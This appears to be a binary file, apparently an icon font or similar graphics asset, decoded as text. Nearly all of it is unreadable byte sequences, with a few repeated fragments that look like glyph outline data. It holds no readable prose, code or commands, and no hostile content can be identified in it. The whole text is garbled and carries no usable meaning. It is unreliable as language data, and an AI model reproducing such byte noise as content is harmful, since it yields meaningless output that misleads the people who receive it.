C��!������������uz��%'7''73267>7>76&/?'.'.#"'7'7.#"733267>7>76&'773267>7>54&'7'#*'?#&47>7>7>327'.7>7>7>32?#"&/#"&/7�[$<H	

''		
IfC$CfH	
('				H=$Z�e++y
	6
�
8	�
	Z$ZDZ$=H



&(


HfC$CfI		


('		
I=$Z	R++��
8		�

6		�eZ$Z	
+��T7013267>54&'0&#'&"7*##35#"&'.5467>7'3267>54&'.#�

hP'DG))G
	!N,,N!!N,�
	Og�	]U F')GG)'"*,N!!N,,N!����
&3#5''73'3267>54&'.#"3#"&54632�q���YH��bPw3



���rY���Od^



3��1Jc��"3267>54&'.#"&'.5467>32#5"3267>54&'.#"&'.5467>32#74&'.#"73267>77'>7>5!467>32#"&'.5	



					

2222++++� K**K 

	#
#
  
#
"	

�wD''DD''D'		
		
		x	

	�2112�,,,,x*K  K*,#,
+		+
,",&EE&'DD'
���16;@EJOTY"3267>54&'.#"&'.5467>32#3#53#5'3#5!3#57'7'7'7'7..//((((�ff�ffGG��GGGG^GG`/../�((((ogg�fff��
GH��GGvHG
��GG��'35!57''7!57���#3"g����Ԁ���-xx����>eg��g���NN�<��(AT77'.'.'5#3267>54&'.'"&'.5467>32#75#35>54&'�*!&CG))G�%AA%%AA%	



T*"" E')GG)%��A%%AA%%A�pp

$$

��
'#7'7#'7/373666��6��6��'nn+c�**�n��f�hh�fltPP�G��O=�
2M3353#53#?'#5377>7>54&'.'>7>54&'.'3�}~�DD�bfgf�		
		
	


		7	wggeDhfUUYQ�SUe&'
 +* 
7



1��1Lg�%"3267>54&'.#"&'.5467>32#5">7>327.'.#5">7>327.'.#">7>327.'.#
		

		


(	
%%
	(#C2/?""?/2B$6'
$12$
'5�	
				
	x
		
�



�,*+
,D

&
#


#
%

*%��%#'#337'#37'737'#}8e�VO�l8MM��OVS
�e8MM8lS�7��8LMDWz7
ML8X3��	0!!!!%3267>=35#3#"&'.=35#33��f���x��((3
##
3��f��wx���));;"

";;��^w��".'.#"3267>73267>54&'.#"'>7>54&'73267>54&'.#2#"&'.5467>3'"&'.5467>32#%"&'.5467>32#�		�
		



	�

					��		



	U

�D�		
T

			]				
		\		T	
		��

D�

<��3Oj�"3267>54&'.#2#"&'.5467>3#"&'.=3267>75#"&'.=3267>75#"&'.=3267>7)GG))GG)(AA((AA(�A((A%77%A((A%77%A((A%77%�
#�#

##
��/D



//V/

/7��!:%'>7>54&'.#"3267>77%467>32#"&'.5�t	;!";;"


t�5445,t


";;"!;	t�5544G��c�����1Jl���%>7>'.'.#".'.#".'.#"3267>73267>73267>76&'.''2.'.'.'.'>7>3.'.'.'.'&454&5465<7>7>7>7>7.'.'>7>7.'.5'.'>77467>77>7>7.'.'<5<5'2.'.'>7>3>7>32.'.'&47"&'.'&67>7#"&'.'>7>7#7#"&'.'>7>7>7>7�			




				

^								

			P

E

W			>		U


�	
	
	(		
|


�	

� 
"
!
 
!
"
 t		�				



	
	BN	
<

�




^	�P




^		^��7!'!3#53#5^����3��"檪����fxx���kkg��D+
��
%!7'7'!5#%!7'!3���H\\Gx��hH\\G��qH\\G�VH\\G�3����)-%#"&'.5467>37'"3267>5#5�D''DD&��*J  K**K �oo�&EE&'DU^]U J+*K  K*@A�>�1m�%4654&'.#".#"3!267>54&'.##!"&'.5467>?>7>327>7>320132#'"&'.5467>37'"3267>5##�0%
			

%="

"��	
		
*

�

@@



�0

	
%
#"

�

			)


<	
	%%



	+��'8ER_ly����������"/HUn{0&1%&!"3!267>54&'.##!"&5463!2%"32654&#4&#"32657"32654&#"32654&#4&#"3265'"32654&#2654&#"3"32654&#3"32654&#'"32654&#2654&#"3"32654&#3"32654&#'2654&#"37"32654&#"32654&#"32654&#5"32654&#5"32654&#"3267>54&'.#"&54632#"3267>54&'.#"&54632#���#��		z	��z�^��kk^�����onn7�								NUD	��		�����@3go��3�3
		
"#



""��27<E"32654&#3"32654&#%#5##";35326=4&#%3#5#537#5##5!x



3



*^�^^�^�������gV�V�







DUU�DD�DDD�x��Dff��X�h%'7%'7��޼��3��޻���kkk�k��kkk�3��73#5#"&'.5467>753267>54&'.'�^'
D''D

%+ K**K -���""3&EE&2"&8*K  K* 9&3)��
%5##!#'3#53#5##53#5353353!<x���gVV��x��gVV�x���m**��D*�""�x33��""�+��1="3267>54&'.#"&'.5467>32###33535#,N!!N,,N!!N,)GG))GG)	vvww�!N,,N!!N,,N!�gG))GG))GDwvvf-��
'-x�4��u��*��������'I/?>?'77>7>323''?06?7'7>'&"#"'�e]T�-�O		
O'-VN'aZ_V'VU��e[d(UV,'O			P�,�OW�YU`��VU'We$��5!3!#!!#!!��o;�;��o��*���oWE��E3�4�E��x����',7<#";267>54&'.#+"&=35#3#546;23#5q�		�		�������44��b��KOO`��"������=jot''&"326?.#"01"1023267>7>76&'7'>7>753461425263>7>32'7'7�D����

 A��
	'&	Ve,e,�,�,��D����P		B��
'%	ee,e,E,�,�+��77'%'7�L�V�wF�G;і����E4�уw��/����KPm54&'.#!"#"372#35#54&'.+1#"&=46;3!267>=35##53#!"&'.=467>3!2�	��

�
"U"�	�33�	��			�		
;
;��;

;		�w��]		F		F3��-=#"3!#'53#3753!"5467>3"&'.5467>3!!�		
T�*.Xw?;���	D���
		��	
��'(��56�����

M<��..#"5!!#7>54&'!337#57>32�
	K��DLM���#�A���K��L
	��"�%��X�
�X�h7'577'5���������h��kk���kk�+��):?DINS#03:3:3267>541!"&=3+%#!>7>5!3#53#53#57#35#53�f
			U45c
��/U	b
��"��������������r

i�gzs
	"

	b��D�<怀o^^+��	-6O3#53#53#5%4&'.'*#"326764=7'5#"&5467>;1+������3w1ee#
�%5WLM� (

��		
#�
A		��


3����;Tm.'.#"3267>517.'.#"3267>5<51"&'.5467>32#%"&'.5467>32#��	

	
	�
	



	
��				�d�


	


X�



		
'�?		^				�����1;EU5467>7>=#3267>=4&'.'#5#467>7#5"&'.=3#	


+//+ff%�%fo(�(W	**	,..,|w&&w�'bb'�1Jc|�"3267>54&'.#"&'.5467>32#%"3267>54&'.#"&'.5467>32#'"3267>54&'.#"&'.5467>32#3



�



�UUUUU+��$J3267>7#"&'.5467>773267>7#"&'.5467>71� J*
%3)I
%/#<"O-&E'$'C�
*I 	&

 H*2%
&	(D%-O"=$
D&"
"��%!3#35#53!!�D�;�;�U��fq3��DD"��o����5]%267>=4&'.#"3467>32#"&'.=#"&'.=###35#5#>7>=##

#"



"M






�//2M�L2z
"�"



"�"




�

�UU..UU4UU4U3O�q	!5!!5!!5!7!!5!5!7!!53��f���x�w��fx����fx��qDD3""�DD3""�DD3""+��
!'1'77'7'77'q^fooffod�UUfUUgUUfUU�/38��8448f3��*@+��**A+��**@+��**A+��U����3Oi2'.'.5467>3267>54&'.#"35">7>54&'.#1"&'.5467>32#1 8��8 



#>	��	>#				�8 
	
��
	
 8�	
				
	�>$
	�	
$>�				+X�h !!#"/!57326?!%'7�g���f��oo
n//n��{ooh����oo��m//m
oo�+����#,1'.#"!'%762'.#"'71571762!%'7Ժ���r��{-.{	fopc
����{qq������{..z	�n�p{	����pq+����).5>CHMR'.#"#!'5'62#7'.#"'537'751571762!%'7%3#53#553#5Ժ)=U�BB�TJ3(-.'��:C	
po
����{qq�xxxxVV�(>U��B�B�-4�(..'�:�B	-pn��	����pqmf3D��#(G#"&'.=#3267>=##53!#53"&'.=33267>=3#VfD''DfUDD��DDg#>D
&&
D>#����&EE&�3333�x>#��%%��#>qO@w7"&'.5467>321#35#'#.'.#"3267>7'#%">7>32#"&'.'1'33267>54&'.#G���#

#		"<!	
((
	
"		
	#

#	98

((3���
##
	!<!((
�	
##

88((Fz1Jc|�"3267>7.'.#"&'.'>7>32#5"3267>54&'.#"&'.5467>32#5"3267>54&'.#"&'.5467>32##@>"7E++J  56  J*&>299%B22B&%%%%







				z9$857��1!210�%%%%�



�



g				U��#(%54&'.#"#!5#'467>32#5!5!o((<V<�
##
����4�f((f��f"



"ff�������w�7F375#3#'553##'3"3267>=4&'.##"&=4632�;x;���;VVXV/�--



	�3g��fg3�"""^��'QM^	"		"	<""+��2m%"&'.'7326?>54&/.#"'7>32#"&'./.546?>32'.#"3267>?#

	k
		
		LLk�k

	k
		


HH�		

	l		
		
KKl	�	k	

	l		GG	+!��&N2'.'.5467>32>7>35".'.#"7>7>54&'.#1^%��%+��	
+�%
	��		
%				+
��
+U����/4A�4&'.#"1202135467>71>7>553#"&54632#8##5>7>54&'.#"#54&'.'041"4#04#.'.5467>32�>##>
		�		
�ff3



\*		*	8  8	-#>>#'
	xx
	
'��33"



j
"��"

# 88 #+��16"3267>54&'.#"&'.5467>32#'3#5,N!!N,,N!!N,)GG))GG)n���!N,,N!!N,,N!�gG))GG))G�<��1Jc|�����+D]v���7"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#267>54&'.#"352#"&'.5467>3"3267>54&'.#"&'.5467>32#o���UwU;	

	V

<UwU;	

	V

<UU	

	V

+O�q.9H%''77'7!3;267>?>7>5735+"&/!7#!"&='!?3334
33
4�V�S�	>1
��
p�3333333�"
��
"�
���

  +��#<U267>54&'.#"35#3#35#"3267>54&'.#"&'.5467>32#



3E,N!!N,,N!!N,)GG))GG).



#�;!N,,N!!N,,N!�gG))GG))G*��
#5#77'3535335'#5##57UE<��ֈ""xDx��"UfU���U"f<���D""D��ww̚��ww����
3��2M\x�����"3267>54&'.#"&'.5467>312#?'>7>54&'.'7.'.'7'.'.#1"'>7>32'>7>7.'.5467>77.'.'7381267>7#"&'.'7'>7>7*K  K**K  K*#

##

#fA@8@
+	
I+



+



�+
@
	CA@@	*	
I,+



�*	@
	� K**K  K**K ��
##

##
�+


+

:+
@
B@@@
+
I+

+


�+
?
	CAA	?
+	
+��1dq"3267>54&'.#"&'.5467>32#"3467>323467>7>7>54&'.#"32654&#,N!!N,,N!!N,)GG))GG)							





�!N,,N!!N,,N!�gG))GG))G4
				

		
�



+��%#####5##5#1!5�UUUU���w���ff���3��
!!''!5777!3��f�qMU32x��54UMm����f�J�=x":?��="v=�������r����""&#"'>54&'.#".#"3267>54&'.'732673267>54&'.'7:3267>54&'.#"&'.5467>32#7"&'.5467>32#"&'.5467>32#"&'.5467>32#�	P
Q		V			V
P		P		��



�



�



o



�	�C
	�			�C			
�		�3
		
�				w	

	"	

	+��(1FU%4&'.'1#13267>7178175>7>5'5"&'.5467>7#7'7� K**K !N,
 "�4"�)GD'p

uh�
�+L""L+,N!&2OC�*��G)'F Ǥ'�C-#
+��*9GUdx�������':81818#"32018181267>54&'.#267>7#5=#'"&'.'>7>7#467>73#>7>7.'.'3;".'.5.'.'>7>352=3.'.#73.'.'>7>554&'.'>7>7#7.'.''.'.'>7>7>7>7.'.'>7>7,M!!M,,N!!N,	LM	^]		]M	ML]^		^&


�	

^

	
�


�!N,,N!!N,,N!	M\
\\
mM	M

M	^\
\\
mM	M

�
	
6	


��
	

6	


f����
37#773#7,a�a��q�q��ճ�<���"�uKMf%#.'.#"'&".'.#"#";3267>5<573267>732654&#"&'.5467>32#!"&'.5467>32#�$"

"$$''$�� 

 !!!! 

 �"





""
'

'
"g        3��)26Ohqv{>7>54&'.#".'.#"#!##537'3'#772#"&'.5467>3467>32#"&'.573#533#553#i			



			d�dS�
*%��

<

�

H%*
�����ų�F
	

	
��D��H@"V

3

E@H��������31��$4?#54&'.+"3!267>=4&'.#%46;232!5!"&=!#��VV��
V
�
��g��
x
d	���
	


<��
��
f$��+[0#"&'.'.'.#"35>32326?5#"&'.'.'.#"5>323267>7�+$
					
%						
&.		
					

						
	
�
������"��
%#5'!'357!3f���UD���������˛k��
'#!1'#533!���*�qq�w�����f	yqq��x��3��#5#357'737355#35#7'#35#��zz�czz��z�cz�zzc���czzzzc���zc�znzz�3��	735#73#5%35#37%35!#33����3�l~}��x�������3�~~bͼ���<��4Pi��4&'.#"3>7>5"&'.5467>32##3267>54&'.'"&'.5467>32#75#35>7>54&'.'"&'.5467>32#�	

*				��
	
					�	



�		��#



�#��		D



恁��D



^����"C%4&5'113267>54&'.'"&'.5467>7041701#��x;"";�5}}5��"�	

!;;!

	�4
		��		
4+O�q*#!5'3##"&'.5#7!533267>73x�^�]��M�

�N4�xy





yqf��fU		U��
		
�U=��7'#73!35#!�WWB4o��o�VWWB����"��E	 ��$).38!33#!5#5335!!'#35#53;#553#53#5!!5!!5�4"��"��"3��f�ffDD4wwwwww������++3��"���ggVEEV+^3"��
7P%!377'53!!''777'"3267>54&'.#"&'.5467>32#�D�PQQP�U��f�3"5'0$7/]



u3��!----!"���GBk�dbGL�$	

	V

3��
#!!'#53!33533#53#53#5w���V"��g��V�
L�w������fDVxx��x��L��V44�33��	'\!!!5!!!3#5;#5#335#"735#37>32#"&'.=#3267>54&'.#3��f���x��x��o�m!d8F




��f�MM����^�_�(H



��2@P]0"+1!*1"5#35#5>7>57>54&'.#'.546320313#"&'.=!7532032�1��
K2D�D2K
��?	2//P?2	�
K3��3K
m?
\//ooR?\
��#(3'3#!5#%7!3#33#33#33#33#�D��>"�"������33D33D33D44E33���nn�������+��%7'!5##3!3535#!!���33"DD�����X
33��44������F�z!,7<AR!"3!267>54&'.#!!5#!"&=!%5463!2!3#553#5326=4&+"3�f		�		�^��V��f��V��V"��ff3"

"

z
�


E""�����3D	

	B��	
"'##!53'#533##55'#533#�W�hhW>>��V�>>VVE�VVjVE��E%>>>�iYV��R>>���V4V��+��Xq��73#'#5'.'./'7'.'./#537>7>?'77>7>?53267>54&'.#"3#'#3735>7>77'>7>735#.'.'7'.'.'51"&'.5467>32#1

$,-!$!	
4
	!$!-,$

4



+V!<!/1#<$
V
$<#1/!<!+



�)$	

4
	!$!//!$!	
4

	$)��



"- <!
V$<$33$<$V
!< -��



3����*C\aei>54&'.#"3267>54&'.''2#"&'.5467>3"&'.5467>32#'?77'7 		%? K**K ?% 



'DD''DD'f�B�AJ+R'8,R&�		$E&+J  J+&E$6
		
�DD''DD''DUB�A�w,'S ,&R3-��3@MZ!";53267>=4&'.#+'#"&=463!2'"32654&#3"32654&##"32654&#����C#
4+�

V
�



D



�



��
DD
��
,,
�

ހ











<����%).38%35!3267>753#5"&'.=!#!5!3#5;#5'3#5�D�x;" :33�5"5�D��U�E���";8 xgg�5oo5"�MMMMff>�;n20132+!"&'.5467>?>7>327>7>35".#"3!267>54&'.#4654&'.#1*

��	
		
%
			

%="

"0q)




			

	
%
#"

03��17"3267>54&'.#"&'.5467>32#5#35#*K  K**K  K*'DD''DD'fw� K**K  K**K �wD''DD''D��+��1H"3267>54&'.#"&'.5467>32#'&"326?64'&",N!!N,,N!!N,)GG))GG)k�09��!N,,N!!N,,N!�gG))GG))G�09�+��5!333535#5!###'#5!U�ր�D*����o�*7�5��DD�U�oU�77����6Ohm!'#33267>54&'33267>54&'.#1#'37#"&'.5467>323#"&'.5467>32/!#�PCS		x			��E��
		
�				�)J:�Fx��
		

			"��

		

		^��+>��+Haz��#'0"9.+"1#"3!267>=4&'.##!"&=46;77>;232'"3267>54&'.#"&'.5467>32#5"3267>54&'.#"&'.5467>32#�F)
U
(H

f


��

OU.N
�((((#

##

#







O)(���

�
.
��((((�
##

##
�



�



3����L�"&'.'.'.5467>?>32367>13>321#"3267>76&'.'.#"'"&'.'.'.7>7>?64'.'.#w0?*
		 
	
7
�	

(=+			4!	;(&@.	C

	)"%

�	+>%'9		
#
$)
Bf��	&7>ELSZaho35#73#57#";267>54&'.#+"&546;2'5#35#5#35#5#35#75#35#35#35#5#35#5#35#35#35#�������

�


�

�
�D"D"D3D3DwD"D3D>DD3""<��V��

V

���3DU3DV4E�3D3DU3DV4E��+��	!!!5!!!!!5#3#5;#5+��V��x��x��x^��E#��V�DD�x3��o����'7'''77��������	��������QT��SS;��JJ��+HHHH�JJ��3 ��
/@!3!35!!!5!3267>=4&'.+"3'46;2+"&=�fx"��V��x�||	|		|	�o��o���MM�%+��5FW#".+";201235154630213267>54&'.#46;2+"&5!+"&546;2��

�

�		�

��
�

�
�
�

�
�
��

	

"
��"

��



"

��SmKU^|��"'35##'35#01.'.#"3267>7326?3267>54&'.#'#.'.'7#7"&'.5467>32;#7'3"&'.5467>77'>32#�	* <�9$	#

#!
FN

##

#�>3@L

&O

�>�G�

$$


S"&?
#"


�4

"



"#
&{	6{6V

C		[{{[

	HG

3��0>%54&'.'54&+"!5'!575467>32267>5#3�,

,<�<+��</.<�	V	��0

0�00;1�..�1M		qOCQ;5#"#"&=46;%4&'.#54&'.+32+3267>=267>552#	��	���"
	����	
36�	�	���^#	�	#"D+��&@N\v�"3267>54&'.##>7>7'2#4&'.'>7>3#>7>73.'.'"&'.'>7>53#7.'.53,N!!N,,N!!N,ę#
�

	
4
	

`�
#d�#
�

	
4
	

`�

#�!N,,N!!N,,N!�+'#0�),,)'+0#�*'"0�),,)'*0"+>��#3.'.+'77524&'.'5�,E43����;4
YOaF;(Epp!��U0+P%&6V��!!3#5"32654&#����n�		��p�"��]�ww� ����>W%'7>7>54&'.#".'.'7'73267>77467>32#"&'.5�"L2	3
				

	3	.L"
$;! :$
��

XF+3		
	



	
		��*F220-*��	!!!!!!57!!5�4��V��g��x"D��h��U��3��g"+��*COZfrx"73267>77'>7>54&'.#"&'.5467>32##"3755467>;17#354&'.#1'132#35#'D,
+
$$
*,
D'#??##>>#M3
pf		"�3p
Df"		�^p�E'"
5446"'E��>#$>>$#>�
3pf"		p3
wf		"x�3-��!3!'37#%#'#5!�f�X4X���tt�0�33�x��ff����f<<����aA77'7'�
UTTTTU
TA
TTTTTT
U+��1=3267>54&'.#"#"&'.5467>32'77'7'iO))OO))O"H&&HH&&H�
UTTTTU
TwO))OO))O��H&&HH&&H�
TTTTTT
U��`'77'`TT0`
UT0*��19%267>54&'.#"32#"&'.5467>3'77',N""N,-M""M-(HH()GG)aUT0!N,,N""N,,N!�G)(HH()G�`
UT0��?@%7'73aTT1�`TT0*��1973267>54&'.#"!#"&'.5467>327'7*"M-,N""N,-M"�H()GG)(H�aTT1�,N!!N,,N""N,(HH()GG)aUT0��-@77'7'�`TT0�`TT0*��19%4&'.#"3267>5!467>32#"&'.577'7'�"N,-M""M-,N"�fG)(HH()G�`TT0�,N""N,,N!!N,)GG)(HH(`TT0��`77''�`TT0�aUT0*��19"3267>54&'.#"&'.5467>32#'7''-M""M-,N""N,)GG)(HH(
aUT1�"N,,N!!N,,N"�fH()GG)(H�aUT06�	y7'7'#57<54&'.#".#";5#"&'.5467>?>7>327>7>320132+3267>54&'.#�ML88�1$		
	
%oo

	
	
*

xx"

#�
LL7��7i1


%


			*


##
���	y%'75377<54&'.#".#";5#"&'.5467>?>7>327>7>320132+3267>54&'.#ALM88b0$
				

&oo

		
*



xx"



"JLL8��8�1


%


			*





"#

A�16<DLQV[`"3267>54&'.#"&'.5467>32#'!5!!5!!5#!5#!5#!5#3#53#5%3#53#5






���m���qI���J�����2222
22224

T

���8��(��"�������5'7'7577'57'wflqk�yu�^^bb�flqk�yu��^^��bb��a�"',37'#5##3#33535#5'5!!!'7!%3#53#5�u33u��v22v���$$����$$��TT�TT+<:""v;;��vT)+2T**u�	��	!&+�3#53#553#5'5##!##53'3#53#5!!7.'.'"&5467>5>76&'4"14676&'.'#0"#3581025>7>7>54&'.'5'0&'<14656&'467>73101213<54&'
uuuuSSC�������""�����m�	




e2�33��q""2TT2""����K
				
			
��%/:S#7'7'.#"723267>5<57'.'.'7/77"&'.5467>32#�50�wY4>^D4_w_KG�K0

6Y....3`50kwZ4>`E4`__L
G�sM15B.--.��q�1|73267>54&'.#"72#"&'.5467>37'#"&'.5467>77'"3>7>323.'.#5267>72:!!::!!:�4444_
(F
'* J)
#	




	#

�!::!!;;!�4444��.F(3$.
(8*K#��5Pk#935151511'#53717>7>54&'.'7>7>54&'.'7>7>54&'.'�{_`zdTTd8D



4					
	
	
	
�bLKaa�b�NNvP?v�	

	





= $$ "&(#7-32,.56/0���w73:3:130233:3:13023:3265<54&'.'.'"&5467>7>76&'<1&676&'.'.+"0.'.'&45467>7>76&'041&676&'.'.+"01#467>7>7>54&'./.'&6715061516&'&67>7>731!5'467>7>7>54&'.5/.'&4=3<1536&'467>7>739#5H
Z		
Z	


	
	
				

�
		
	

��

	


u�
			
		
		
						
			



	
	**
	
		��i�"3267>54&'.#>7>7>7>='"&#"&'>7>737>7>321#"#"&'.'7.5<1063267>7.'.51.'.#"#3210.'.5467>32�)J  J)*I  I*n
			
			
		�9		

9C&'C
�I**II**I��!



				





	

 !! 
	&&CC&&��1:%4&'.#"3267>5!467>32#"&'.5%7'735�!M+,L!!L,+M!�mF((FF((FffQ�+M!!M++M!!M+(FF((FF(
ffR��I�w1Z%4&'.#"3267>5"&'.5467>32##32+3267>54&'.#.7777�1111ɀe11e� 77 �7777�11111177G�w\g������7'.'>7>'.'.3267#.'.'.7>7>73#3534&15#.'.5#35#'7'>%.'&67>76&'&'.'&67>763#5;#5!3#5!3#5��j-



(D

N262E��3$��




33�22��33P22�OKB	

:
	

	



PgD



f

]��7<AFLQW"#33267>54&'.#"&'.'35#>7>32#5#3=#37!!#531!!!!1�









::


���
������\��~�,				

�

3C�2Cv����?�~���`����1:7267>54&'.#"32#"&'.5467>37'#3�+M!!M+,L!!L,(FF((FF(
ffQ��!M++M!!M++M!�F((FF((F��ffR��JZd%1"1#"&'.5&6777>?7'7''7''326?>327.#"'7#"&'.5467'7-�
 !

/0HG0GG/0''�!"
�0v/

��



 
0/GG0GH0/&&�

�/v0v
��.Y3:377'7'..'.'645./?117>76.7>?'1.'./#"#"&'&	z��z#",�`Y3�	

,";	,"#z��z	&�aM*�3(���>7>312#"&'./1'.'.5467>7>7>32'.#"3267>7>54&/.'.#"'.'.5467>7"
		
�
cv	��

�	
				�			���

�dv��
	�		�	
		��



����	 >S73#53#53#5.'.#"#!#5467>32#>7>?!33.'.'53e���Ɇ��	
		���S
�	���
�	
��CC.		�L�&���
		
�n��"'%5#535#3##35#53#35#'3#5#533#53GuK�LuL�L�L�L�����놆�*��*����ۇ���������''5#9373717717537#31'515�r{`?kvc~��Ud{>�Vs�r]bLKkvd�uP?zNCZ`l��.�'AZs�>7>=#3267>54&'.''53353.'.#".5"&'.5467>32#5"3267>54&'.#"&'.5467>32#�
�
77 �ST



\1111$$%

%




" AA #		)77)	w0ss0D%J�|1111�
%$$%
�



��S�%4&'.+>7>54&'.#"#*132;267>54&'>7>54&'>7>54&'>7>5#32+32+32+1#"&'.'.+5:3:3267>7>7>54632134132#�
	�			9[


�


&o
	J	


g<
�
N
�
			�&!*E��1:"3267>54&'.#"&'.5467>32#'7'35#�,L!!L,+M!!M+(FF((FF(
ffR���!M++M!!M++M!�mF((FF((FffR����%I3#54&'.#"357'57'>7>5#5'.'.5467>32m~++

T*)

Q$$2		
%%
		CC2++"�;!**"^##/1�%

%��h�����"5467>;267>7#+"189.'.#"381267>7>7>3:3:1:323812654&'.#9"&'.'.'.+"#9"&5467>323267>7>7>32#%##33535#7"3267>54&'.#"&54632#7"3267>54&'.#"&54632#\


#
%


)/
		
/)
F					2					#
		

		
#��""""�				C					


&
#	L23

32L�%0FF0%�!""				"				"0��	#(-26:!!#535#535#535#53#3#535#535#535#537'5��\C22222222
��C33333333�uuCC���`��CCSDDTDDTCC�>_�CCSDDTDDTCC�DD''N��1f�	l�7267>54&'.#"352#"&'.5467>3>54&'.#181"813267>7465'0010101'>54&'.#818101*#81'>7>71>7>783>3:1263:3263:3201201"1"#0#'>70"1"#"*#"*1"#0#**1*#"&'.'<5<5<7<1467>781>7>781813267*1'#"&'.5467>32�				

�!M+7&!L,'F%d

	T
		$A"-	8dT'D 
S
8	
		
�				C				3
+M!(	

+M!A%<	
S
<#qh=	:C&

S

h�
	

0��h��%.'.'.5467>7>76&'<#4676&'.'.+""#3:3:13023:3265<54&'!5467>7>7>54&'.'5'.'&65>5156&'&67>7>731211?''77,







	Y

Y	
	��

	
	

G,,,,,,,�	
		
		C*	
	



		*�+,,+,,,��1:73267>54&'.#"!#"&'.5467>327'5#!L,+M!!M+,L!�F((FF((F��ffR�+M!!M++M!!M+(FF((FF(
ffR��0��h��%.'.'.5467>7>76&'<#4676&'.'.+""#3:3:13023:3265<54&'!5467>7>7>54&'.'5'.'&65>5156&'&67>7>73121175##33535,







	Y

Y	
	��

	
	

CCCC�	
		
		C*	
	



		*�CCCC��	'@Yr!!3#!!'267>54&'.#"32#"&'.5467>3267>54&'.#"352#"&'.5467>3#"&54632�3++���o�!;;!";;"4444

��f���x��x��;"";;"";35555�U"��29HW735#3.'.#">7#3757>7>54&'.'5#73>7>32''7g0D'0&-2*
�:*<7;:�
	�O$)*#��=��g0(E0	
�9<6;+9�*3.&��
��
#**$������-C!!570513830292.'.#"0+81'7526324&'.'3!U��ͫUE2	(!{{4E/-

'�����@t:m
%-SS x/M
&!3$������ )6CP]jw��'.#"326764''7'77'789'#"&54632#"&54632'#"&54632#"&54632#"&54632#"&54632'#"&54632#"&54632�l��lL�mal`tlgmh�llll0T0�0U1\l��lL�lam`slglg�mllm�00�01	-��%>K�����7"3267>54&'.#"&54632#%"3267>54&'.#"&54632#7'.'.+"#333267>=33267>=354&'.'535#%>7>;2!7#"&'.=3!#"&'.=37!5467>3!2^











#	�<7			�		
7;��	�
��
	34

4�g
U
�

4



4

4



xD

D
ww
	?RQ��				�ff��'#'+7#'3'#7'353�d�d���UV�Y�WmW�Te����5xx	��ffggdddu�������1Mm"3267>54&'.#"&'.5467>32#74&'.#"3'>7>5#?'.'.5467>32�,N""N,,N""N,(HH()GG)E	
		
$�#
Y

	

�!N,,N!!N,,N!�gG))GG))G�	



		ff
	�O


	P��1Gc.'.#"'73267>?7'7>56&'#"&'.'.546?7'7>7>32�=#)�		$$	

�&!=

��		�A��M=	
	=�>#(�
##�'"=

��		�A��L>	

	=#�/T7>54&'.'.#"3#33535#5267>7'>7>32#"&'.'.5467�







EEDD
�	

		

	�6666
EDDE
�
	/0	/0Fz!&+0%#5#5##5###3335335353553##33#37#5324D�E3443E�D42�E""U""�""4##�f+��+ff+��+fg��+����+������ %'7'777''7/7''7��

�	^��]�y``*sar`=`_�
��	^��^	�yaa+r`r`�aa����Vdiw%4&'.#"33151"5467>32.'.+32675#35>7>7>7>5<515.'.5467>7#5375�"N,,N"
%
H()G


VU&	��				�33f				�,M""M,W&�&(HH(&
�
	3
W��F�
����HWp������%5#4&'.'7'.'.'5#'#3735>7>77'>7>53'#.'.'7"&'.5467>32#7.'.#5'"'>7>7#>7>73.'.573.'.'5267>77'>7>73�<
**  ++<<
** !++
>MfI	�

sJ	
{J
vIf	+fH
7H	
{	H
vHf	� ++::++ !++=<++ 
H

<�Ii
-hI	9H


|	H
tGf
,fH
8G

+�&6F535!3#!5#54&'.'>7>5#5467>7'.'.=3�,��+
	"!

	++,	

!"		�	
##
	Z#	
�	
#?ee


XX


�XX

q	ee	���?%4&'.'35>7>557'5#'.'.5467>700--�6*,8'++'�+K !::! K+(5^^5(�B6*�Q,8�."%B55B%".��	"'?'3#5;#53#553#5'7'7/7���DD�EEDi0000�1
0��EDD�DD+11�11�00��&?7.'.#"3267>54&'.'77"&'.5467>32#���	555	�)�[//..��555

���(��/../����#(AJO%'5>7>54&'.#"'77557467>32#"&'.5'5357573	
	3��w���ff#				fw33wff�h		^8�8DD�D�)�*�B				��E�KB�<3�3�����,B'!!7'5815#*1">7>31021021358=!3>7>3:7ޫ���U�{{!(	13���'
./DQt@�w:SSS-%
 �hg$3 '
M.�����(8Ng�%1'54&'.#"3267>?3'%467>325#"&/.546?357#.103267>5&4'"&'.5<59>7>7#f�
F`	
		zi4�EĀ
a��G�34		6�

kG	
`{5�DZ̀`�l}��#IJ#		.				����*/45##;267>5#'3#5+"&'.533#5;#5��3
�
3xgg��͉4>����

www�t

��s++++��1J!!77!5!5!5''5!'267>54&'.#"352#"&'.5467>3��Uxv<Y�}��w�]<xx�^				

		��f���~w3Z �VVy`3w}��				E
		
������(A%#.'.'467>7.#&"'>54&'.#".'.5467>7'3267>?33:3>3326?>764/>7>73267>=.'.#%467>32.'.5+#"&/#*'./#*/.'&4?'.'.5467>3:27>7>732'#"&'.5467>32�
		
		

				



		

		��

		

^	


	

B&
	
	^�


		








	
		

			�		

�		

	


4

			
	8	$��1j������"3267>54&'.#"&'.5467>32#7>54&'.#"'>54&'.#".'.#"75''73267>54&'73267>73267>77#"&'.5467>32'2#"&'.5467>32#"&'.5467>3'557�				
		


�			
		
		&�� ��
	
	

	
ɼ�

�

U�����F				D				<						�bc�jV		
		U|				L				3				LW�X��W�X��!?C%7'>7>54&'.#2'7%467>7735"&'.57'7Hz0
 K*'D+8C��
4z' J+'D\
8B�}0
+J D'

-iD:
� 
5})#+J D'�D:
	��U�1MQajoty"3267>54&'.#"&'.5467>32#<5<54&'.'!'#73#5467>77#<5<53#5;#5#3#5�								U
  UUU�11��					11^+Vi				E	

	s0"
)$$*	#0jkZ??�"

"�??
aUU3333
����HR\fpz����%75'.'.'7'.'./#'737>7>77'>7>774654&5'.'.'7'3"&#"#77'57''7#'239263'"&'.5467>7>7>312#7'>7>7�DD&'3
@
5'%DD&'3
@	4''333N&�"�':33N%�" 8 8
�'�@
3'&DD%'5
@
4''DD&'6
8!
�&:33N&�"�&;33D8 8 
(D�%10>7>5<1'.'.=7'77'7'��>*+=��6&%7���3333333��.((.���(%

%(�؃4344344��1Vo�"3267>54&'.#"&'.5467>32#7&#"&'.'.3267>76&''#"&'.5467>323#"&'.5467>32�+J  J+*K  K*'DD''DD'j

!!�				�



� J++J  J++J �wD''DD''D�	

